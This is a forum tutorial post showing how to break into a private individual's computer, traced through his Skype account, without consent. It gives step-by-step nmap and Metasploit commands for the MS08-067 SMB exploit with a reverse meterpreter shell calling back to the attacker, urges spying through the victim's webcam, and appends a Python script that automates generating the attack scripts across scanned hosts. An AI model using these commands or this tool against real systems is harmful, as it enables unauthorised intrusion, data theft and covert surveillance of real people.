Messages - Moon Cat

Tutorials / How to combine Metasploit and Nmap in a charming way
« on: January 11, 2015, 06:12:42 pm »
Brief Introduction
Some years ago nmap and an exploit database were enough to rule half the internet.
Today hardly anyone leads with nmap at all.
All you had to do was tell a customer you were a 1337 security professional.
Keep in mind that customers only applied patches that fixed something they could see was broken on the system.
It was common practice not to apply system updates that didn't fix a problem you were actually experiencing.
- "WTF ARE YOU DOING? YOU MIGHT BREAK SOMETHING!"

Then what you had to do was scan the customer network with nmap, ISS or Nessus.
Because they didn't apply patches and updates there were loads of vulnerabilities on the systems, and from there you break out your 1337 tools and pwn it all.

Today is very different: you'd rarely start with a port scan, and there's so much more you have to find your way through, e.g. firewalls, anti-virus and the like.
Most people would rather go through the web app and look for common vulnerabilities there, such as SQL injection, cross-site scripting, etc.
Today I'm bringing the old days back, and I'm going to show you how to get into networks and make all the boxes yours.

The Interesting part
So, I'm going to assume you already have Linux, Metasploit and Nmap installed.
Let's say your target is John. John has a Skype account you know of, so you run his Skype name through a Skype resolver and get his current IP address: 90.230.176.9. Keep in mind that this is his public address; if he's behind a home router, anything that shows up open is whatever that router exposes or forwards, not necessarily his own machine.
Now open up your Linux terminal and run the following command (-sV makes nmap probe the open ports and try to identify the service and its version, which is exactly what you need for the next step):
Code:
nmap 90.230.176.9 -sV
In your case you're obviously going to change the IP address to whatever your target is. If nmap reports the host as down even though you know it's up, it's probably dropping pings; add -Pn to skip host discovery and scan anyway.
If the host is up you'll hopefully get some ports back that are open.
Code:
Starting Nmap 5.21 ( http://nmap.org ) at 2015-01-04 20:05 GMT
Nmap scan report for (90.230.176.9)
Host is up (0.0017s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE    VERSION
53/tcp   open   domain     pdnsd
80/tcp   open   tcpwrapped
443/tcp  open   tcpwrapped
445/tcp  open   Microsoft-DS
8000/tcp open   http-alt?
9001/tcp closed tor-orport

Cool. We have a couple of open ports on John's network.
What we need to do is find an outdated service so we can exploit it. To do this, look up the service name and the version string nmap gave you in the exploit databases. Keep in mind that the service name alone is weak evidence: "Microsoft-DS" just means SMB on port 445, which every Windows box has; whether it's actually vulnerable is what the version/OS details and the exploit's check command will tell you.

For this tutorial I'm using www.metasploit.com. I go to the search box and search for Microsoft-DS.
Holy sh-, we got a result:
ms08_067_netapi
(The full module path in Metasploit is exploit/windows/smb/ms08_067_netapi. It exploits a bug in the Windows Server service that is reachable over SMB, which is why it matches 445/tcp.)

At this point John's network is not looking good, but it gets worse for him.
For the next step, run the command "msfconsole" and wait a moment.
When it opens up, load the module with use followed by the full module path. For John here, that is:
Code:
use exploit/windows/smb/ms08_067_netapi
Let's see what needs configuring by running the following command:
Code:
show options
Here we need to set the RHOST (Remote Host), which is John's IP address.
Code:
set rhost 90.230.176.9
And here we need to set the payload. The payload is the code the exploit delivers and runs on the target once the vulnerability has been triggered; think of it as a bomb: someone has to carry it inside and blow it up.
I'm going to use a reverse TCP meterpreter shell, which means John's machine connects back to me rather than me connecting to it (that is what gets you through his firewall/NAT).
Code:
set payload windows/meterpreter/reverse_tcp
Let's set the LHOST and LPORT, which are my IP address and the port I'm going to listen on for the meterpreter connection.
Code:
set lhost (my IP)
Code:
set lport 4444
(Keep in mind that John is outside my network, which means LHOST has to be my public IP and I have to port forward 4444 on my router to the machine running msfconsole, otherwise the reverse connection never reaches the listener.)

Now we're set. Before firing it off, run "check": this module supports it and will tell you whether the target looks vulnerable without actually launching the exploit, so you don't throw it at a patched box for nothing. If it comes back vulnerable, own John by typing the following command:
Code:
exploit
Now you should hopefully have a meterpreter session running. It's more than a netcat-style shell: meterpreter is an agent running in memory on John's box with its own commands (sysinfo, shell, screenshot, webcam_snap and so on), and typing shell drops you into a normal command prompt when you want one.
That's it, take screenshots, put his webcam on, do whatever; all his boxes are belong to us.
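As an added example (not code from the original post), here is a Python script that does the nmap-to-Metasploit handoff described above in a way that scales past one host: it parses nmap's XML output (-oX), picks out open services that have an entry in a small lookup table, and writes an msfconsole resource script that sets the options from the tutorial and ends with check, so nothing is exploited until you have read the result. The XML is constructed to mirror the port list above and is not from a real scan, the lookup table is hypothetical and holds only the module the post names, and 192.0.2.10 is a placeholder LHOST.

```python
# Added example, not part of the original post: turn an nmap -oX scan into a
# Metasploit resource script that runs the module's `check` before exploiting.
import xml.etree.ElementTree as ET

# Constructed nmap XML mirroring the tutorial's port list (not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 90.230.176.9">
  <host>
    <address addr="90.230.176.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="53"><state state="open"/><service name="domain" product="pdnsd"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="tcpwrapped"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="tcpwrapped"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="8000"><state state="open"/><service name="http-alt"/></port>
      <port protocol="tcp" portid="9001"><state state="closed"/><service name="tor-orport"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Hypothetical lookup table for this example; its only entry is the module the
# tutorial names. A service name never proves a host is vulnerable, which is
# why every generated script runs `check` first.
SERVICE_MODULES = {
    ("tcp", 445, "microsoft-ds"): "exploit/windows/smb/ms08_067_netapi",
}


def parse_open_ports(xml_text):
    """Return [(addr, proto, port, service)] for every port nmap reported open."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are noise for this step
            svc = port.find("service")
            name = (svc.get("name", "") if svc is not None else "").lower()
            found.append((addr_el.get("addr"), port.get("protocol"),
                          int(port.get("portid")), name))
    return found


def candidate_modules(open_ports):
    """Match open services against SERVICE_MODULES -> [(addr, port, module)]."""
    return [(addr, port, SERVICE_MODULES[(proto, port, name)])
            for addr, proto, port, name in open_ports
            if (proto, port, name) in SERVICE_MODULES]


def build_resource_script(addr, port, module, lhost, lport, run_exploit=False):
    """Emit an msfconsole resource script (run it with: msfconsole -r file.rc).

    Ends with `check` by default; pass run_exploit=True to append `exploit`.
    LHOST/LPORT must be reachable from the target (port-forwarded behind NAT).
    """
    lines = [
        f"use {module}",
        f"set RHOST {addr}",
        f"set RPORT {port}",
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "check",
    ]
    if run_exploit:
        lines.append("exploit")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    ports = parse_open_ports(SAMPLE_NMAP_XML)
    for addr, port, module in candidate_modules(ports):
        # 192.0.2.10 is a placeholder from the documentation range, not a real listener.
        print(build_resource_script(addr, port, module, "192.0.2.10", 4444))
```

To use it against a real scan, run nmap with -sV -oX scan.xml, pass the file contents to parse_open_ports, save the returned text as john.rc and start it with msfconsole -r john.rc. The script stops at check on purpose: only once check reports the target vulnerable do you regenerate with run_exploit=True (or just type exploit at the prompt).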

Related:
https://www.youtube.com/watch?v=0fbBwGAuINw
